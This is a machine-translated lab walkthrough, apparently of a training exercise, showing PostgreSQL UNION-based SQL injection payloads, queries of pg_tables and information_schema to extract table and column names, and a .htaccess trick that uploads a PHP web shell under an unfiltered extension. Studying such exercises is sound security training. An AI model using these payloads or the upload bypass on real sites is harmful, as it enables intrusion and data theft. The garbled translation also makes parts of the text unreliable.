From SQL INJECTION TO SHELL: POSTGRESQL EDITION

From SQL INJECTION TO SHELL: POSTGRESQL EDITION

Here we will first introduce POSTGRESQL. This is a database management system, the same type of software as oracle. In about 8%, the market share was.

Survey the use of open-source databases in the ITPUB community

Test SQL Injection

This is a continuation of the from SQL INJECTION TO SHELL. We recommend that you first pass the previous close.

This is basically similar to from SQL INJECTION TO SHELL. The common part will not be introduced.

This error code has changed.

Use SQL Injection

The attack methods are UNION and order.

SELECT id, name, price FROM articles where id = 1 union select 1 SELECT id, name, price FROM articles where id = 1 union select 1, 2 SELECT id, name, price FROM articles where id = 1 union select 1, 2, 3

Errors are reported in all three cases, but errors are different in the third case. The error message is that the data type does not match.

Try order by again. Here it is easy to test the number of fields. If the number of queried fields is exceeded, the following message is displayed:

 

Search information

We can see from the UNION in the previous step that the prompt is that the data type does not match and the number is changed to null.

Union select 'aaa', null

No error is returned.

Let's try the following situations again:

Union select 'aaa', null 1 union select null, 'aaa', null, null 1 union select null, null, 'aaa', null 1 union select null, null, null, 'aaa'

No error is reported for 2nd and 3, and the data type does not match. If you view the HTML of the webpage, you will find that 'aaa' exists in

We use 2nd build statements to query version (), current_user, current_database ()

I noticed that the function here is slightly different from the previous function. The previous function is version (), current_user (), current_database ()

This is because the previous database was MYSQL.

Http://www.vulnerable.com/cat.php? Id = 1% 20 union % 20 select % 20 null, version % 28% 29, null, null

Next, we try to get the table name and field of the current database. The method is similar to that of MYSQL. POSTGRESQL also has a meta-information database. We can construct statement queries.

Query table name: SELECT tablename FROM pg_tables

Query all fields:

SELECT column_name FROM information_schema.columns

Combined into the instance:

Union select null, tablename, null, null FROM pg_tables 1 union select null, column_name, null, null FROM information_schema.columns

 

Obtain both the field and the corresponding table name.

Union select null, table_name, column_name, null, null FROM information_schema.columns 1 union select null, table_name | ':' | column_name, null, null FROM information_schema.columns.

The contact function is used in the previous step, but this database cannot be used.

Find the USERS table and its fields in the result.

Find the password and decrypt it.

Log on to the account and inject files

This is the difficulty of this article.

I used. php3 in the previous Customs and it was filtered out again this time. After trying, all php files are filtered out.

Introduce the. htaccess file this time.

This file is very useful, and it is similar to windows autorun. inf. Please refer to Baidu encyclopedia

The htaccess file (or "distributed configuration file") provides a method for changing the configuration of directories, that is, placing a file containing one or more commands in a specific document directory, to act on this directory and all its subdirectories. As a user, the commands that can be used are restricted. The administrator can set the parameter through the AllowOverride command of Apache.

The content of the. htaccess file is as follows, which means to add a suffix for php module execution. The suffix blab is unlikely to be filtered out.

Note that ". htaccess" is not a suffix. It is difficult to rename it in the windows graphic interface and must be changed in DOS mode.

 

Rename shell. php3 to shell. blah and upload the two to the server. A magic thing happened.